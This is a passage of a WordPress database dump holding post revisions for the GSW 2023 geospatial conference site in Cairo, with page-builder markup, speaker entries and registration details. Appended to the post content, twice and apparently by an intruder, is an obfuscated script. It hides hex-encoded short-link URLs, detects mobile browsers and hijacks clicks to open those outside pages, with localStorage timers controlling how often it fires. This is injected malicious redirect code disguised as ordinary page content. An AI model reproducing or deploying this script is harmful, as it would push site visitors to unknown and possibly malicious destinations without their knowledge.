_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-10-19 16:08:27','2022-10-19 16:08:27','',2876,'https://gsw2023.com/?p=2905',0,'revision','',0),
(2906,1,'2022-10-19 16:20:58','2022-10-19 16:20:58','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-19 16:20:58','2022-10-19 16:20:58','',2167,'https://gsw2023.com/?p=2906',0,'revision','',0),
(2907,1,'2022-10-19 16:23:07','2022-10-19 16:23:07','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" 